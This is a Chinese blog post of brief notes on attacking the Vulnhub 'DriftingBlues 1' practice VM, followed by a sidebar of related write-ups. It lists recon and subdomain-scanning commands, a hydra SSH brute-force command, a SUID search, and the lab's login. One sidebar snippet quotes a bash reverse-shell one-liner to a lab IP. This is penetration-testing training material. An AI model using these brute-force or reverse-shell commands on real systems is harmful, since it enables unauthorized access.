Driftingblues靶机01

最新推荐文章于 2023-02-02 17:34:31 发布
最新推荐文章于 2023-02-02 17:34:31 发布
阅读量315 收藏
点赞数
分类专栏: ctf 靶机 文章标签: 安全 linux web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37301470/article/details/125090054
版权
ctf 同时被 2 个专栏收录
42 篇文章 2 订阅
订阅专栏
靶机
1 篇文章 0 订阅
订阅专栏

信息收集

主机扫描
arp-scan -I eth0 -l
端口扫描
nmap -A -sV -T4 -p- ipaddr -v

masscan ip/24 -p 80,22
目录遍历
dirsearch -u http://ipaddr
子域名爆破
 gobuster vhost -u driftingblues.box --wordlist /usr/share/wordlists/dirb/common.txt

这里是多个域名对应一个ip地址。
因此直接用ip地址是无法访问到driftingblues.box的,同理test.driftingblues.box。于是必须要设置host文件,使kali能够把域名解析成ip地址,再用域名访问,才能成功。
一开始gobuster失效也是由于driftingblues.box 无法解析

vim etc/hosts
/usr/share/wordlist
密码爆破
hydra -l eric -P pass.txt 192.168.9.24 ssh
ssh登录成功
ssh eric@192.168.192.140

提权(未完待续)

suid
find / -user root -perm -4000 -print 2>/dev/null

账号密码

login: eric
password: 1mw4ckyyucky6
捞氘河水怪
关注
专栏目录
web渗透测试靶机(新手)
05-07
Web渗透测试靶机是针对新手入门的网络安全学习平台,它模拟了实际的Web应用程序环境,让你可以在一个安全可控的环境中实践渗透测试技术。这个靶机通常包含一系列具有不同安全漏洞的Web应用,让学习者通过查找和利用...
Vulnhub打靶之路:DriftingBlues_1超详细打靶思路,小白也能学
最新发布
laity0410的博客
03-13 990
总体来说是一台十分简单的靶机,虽然过程略有繁琐,但一步步只需要按照作者指引即可拿到全部flag,我们需要更加细心的观察页面信息,耐心的寻找作者给予的提示,还要对一些基础的编码有所了解,同时熟悉linux一些基础操作,那么,该台靶机打靶就此结束,希望我们共同进步,一起练习更扎实的渗透技能.
靶机渗透练习01-driftingblues
hirak0的博客
04-13 1321
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-1,625/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshoo
靶机渗透练习02-driftingblues2
hirak0的博客
04-13 1530
靶机描述 靶机地址:https://www.vulnhub.com/entry/driftingblues-2,634/ Description get flags difficulty: easy about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email (it should be on my profile) for troubleshoo
靶机18 driftingblues1
honest_gg的博客
10-31 1213
获取标志 难度:简单
driftingblues靶机(0ok编码)
m0_66299232的博客
12-12 618
2.一顿命令探测没有可利用的,我直接上传了一个linpeas.sh(github里有)脚本,给他可执行权限就可以运行。2.echo 'L25vdGVmb3JraW5nZmlzaC50eHQ=' -n | base64 -d //解码。bash -i >& /dev/tcp/192.168.1.105/4444 0>&1 //反弹shell。/bin/bash' > emergency //要执行bash命令。5.把域名添加到/etc/hosts 下 再用source刷新。4.再次查看源码,发现一个用户名。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
PWN靶机环境 网络安全
05-23
PWN靶机环境
安装部署Web安全测试用的靶机
11-24
为了进行有效的测试,我们需要模拟真实的环境,这就是靶机的作用。本实验旨在通过安装部署Web安全测试靶机,包括DVWA、MCIR、Pikachu、mutillidae和BWAPP,来提供一个安全学习和实践的平台。 首先,安装XAMPP,这是...
Vulnix.7z靶机
04-25
一个vulnhub上的靶机,因为网络原因,下载的特别慢,我下载好,上传上来,供大家学习。如果大家有更好的靶机,请私我。
vulnhub靶机DriftingBlues: 2渗透笔记
liver100day的博客
07-26 927
文章目录环境准备1. 信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口(http服务)2.漏洞利用2.1 ftp匿名登录漏洞2.2 爆破目录 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 1. 信息收集 1.1 主机发现 使用arp-scan -l获取目标靶机IP地址 arp-scan -l 扫描局域网所有设备
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-4
Aluxian_的博客
06-17 1006
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。官网地址:https://www.vulnhub.com/entry/driftingblues-4,661/ 下载好了把安装包解压 然后试用VMware即可。前言:这里又是DriftingBlues-2的问题 需要自己配网卡具体参考:h
driftingblues2靶机实验实战演练
lianliandad的博客
02-02 436
好好学习天天向上
Hackmyvm综合靶机 | Driftingblues-1
IerkeU的博客
04-01 3213
前提概要 靶场地址:https://www.vulnhub.com/entry/driftingblues-1,625/,是一个极其简单的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / nmap下的工具) 二珂说:这个靶机系列是跟着新仔一起入坑的,他太卷了,咱们也不能速度太慢了!!!后面还会再次复习DC靶机的实现过程… 信息收集 arp-scan 192.168.132.0/24 之前都是扫出目标后就之间nmap一把梭 后面了解到这样容易暴露目标 所以
靶机渗透练习01-driftingblues1
Force~
03-24 1801
靶机地址: https://www.vulnhub.com/entry/driftingblues-1,625/ ###1、主机探活 arp-scan -I eth0 -l (指定网卡扫) masscan 192.168.184.0/24 -p 80,22 netdiscover -i eth0 -r 192.168.184.0/24 ###2、端口扫描 nmap -A -sV -T4 -p- 192.168.111.8 ###3、访问80端口,遇事不决,目录扫描来一波 gobuster .
看完这篇 教你玩转渗透测试靶机Vulnhub——DriftingBlues-1
Aluxian_的博客
06-02 1175
Vulnhub靶机DriftingBlues-1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这期更新一下Vulnhub DriftingBlues 系列 还是老样子找到FLAG即可,可能比较偏向CTF点。 Vulnhub靶机下载: 官网地址: https://w
Vulnhub —— DriftingBlues系列
7ruth0hn的博客
11-27 744
文章目录写在前面思路DriftingBlues: 11.nmap扫描Tip:若靶机无法获取IP:2.漏洞探测与利用3.提权DriftingBlues: 2结语参考资料 写在前面 取证学习告一段落了,虽然个人赛失手了,但团体赛一等奖还是可以接受的。开始拖了很久的渗透学习 渗透工具: Nmap v7.91、gobuster、DIRB v2.22、crunch version 3.6、Hydra v9.1、pspy - version: v1.2.0 思路 DriftingBlues: 1 在官网下载ova文件
vulnhub靶机DriftingBlues: 1渗透笔记
liver100day的博客
07-24 1697
文章目录环境准备渗透过程1.信息收集1.1 主机发现1.2 端口扫描1.4 访问80端口(http服务)1.3 目录爆破2.漏洞利用(暴力破解)3.提权4.总结 环境准备 靶机环境搭建 攻击渗透机: kali IP地址:192.168.33.128 靶机:DC-7 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-1,625/ 渗透过程 1.信息收集 1.1 主机发现 首先我们先得获取目标靶机IP,没有IP我们无从开始工作,使用nmap进行扫
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值